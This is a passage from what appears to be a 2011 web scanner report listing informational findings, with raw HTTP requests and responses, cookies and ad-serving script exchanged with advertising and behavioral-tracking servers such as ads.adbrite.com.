bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:22 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0330.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:22 GMT
Pragma: no-cache
Content-Length: 832
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"250\" width=\"300\" src=\"http://adserving.cpxinteractive.com/iframe3?AAAAAFU9GAAOhIEAAAAAAN17IwAAAAAAAAAEAAIAAAAAABAAAwAFCRQ-JgAAAAAAtMofAAAAAAAuiC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-1w8AAAAAAAIAAwAAAAAAPwrXo3A9.j8Mk6mCUUkDQDQzMzMzMwlA30-Nl24SEEBv27Zt27YJQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABuBUJvIsYUCpqBWBcH7M3fP2HzNEqHJ.AI83I7AAAAAA==,,,Z%3D300x250%26anmember%3D541%26anprice%3D300%26s%3D1588565%26_salt%3D2649311919%26B%3D10%26r%3D0,67c82b0e-7c9c-11e0-b80d-a73475668090\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 8487950;
rm_data.offer_type = 20;
rm_data.entity_id = 312668;
if (window.rm_crex_data) {rm_crex_data.push(8487950);}
11.3. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Request 1

GET /adserver/behavioral-data/8201?d=24 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYIZ2ATTRk7wVYjdb0%2Fnf5PHiDFYPHG7B235RpLHgAs3GxOKSFLQqHHEwCsAFMRRPBcxjKXsNq9ZD3s3DY1YmlVKYhVcOoOTQyGLKSMEzm%2Fhy1PoubROv02DwpU8M9QcTneE53MnpqspWr70VR7tRN%2FqHiRi1vOfeknjflCpfX6W9Q%2FtPDpjwLtIELv1YaJg%2BPcTh7Tq9V%2B7FB45pFYFk6h4TQEsWOmVDwT1ZXOcLpoGchC8%2BnFErGMroprw0puXfB1vgF095J6SqH0HwktuxyES5Dxtf1yi0O6gD7y3l58byfxxBeostIiIEE1JWUraHxx8Hn8wU%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/behavioral-data/8201?d=24 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:34:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYIZ2ATTRk7wVYjdb0%2Fnf5PHiDFYPHG7B235RpLHgAs3GxOKSFLQqHHEwCsAFMRRPBcxjKXsNq9ZD3s3DY1YmlVKYhVcOoOTQyGLKSMEzm%2Fhy1PoubROv02DwpU8M9QcTneE53MnpqspWr70VR7tRN%2FqHiRi1vOfeknjflCpfX6W9Q%2FtPDpjwLtIELv1YaJg%2BPcTh7Tq9V%2B7FB45pFYFk6h4TQEsWOmVDwT1ZXOcLpoGchu59PKZSMZXRTXhtScu%2BCrfELpr2T0lUOoflIbNnlIlyGjK%2FrlVsc1AH2l%2FPy4nk%2FjyG8RJeREAMJqCspW0Pjj4PP5ws%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:34:10 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Thu, 12-May-2011 13:34:10 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
11.4. http://ads.adbrite.com/adserver/behavioral-data/8203  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8203

Request 1

GET /adserver/behavioral-data/8203?d=2716 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; vsd=0@1@4dcbc6b1@cdn.turn.com

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnm5TfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:31:36 GMT
Set-Cookie: vsd=0@1@4dcbe138@bcp.crwdcntrl.net; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:31:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/behavioral-data/8203?d=2716 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; 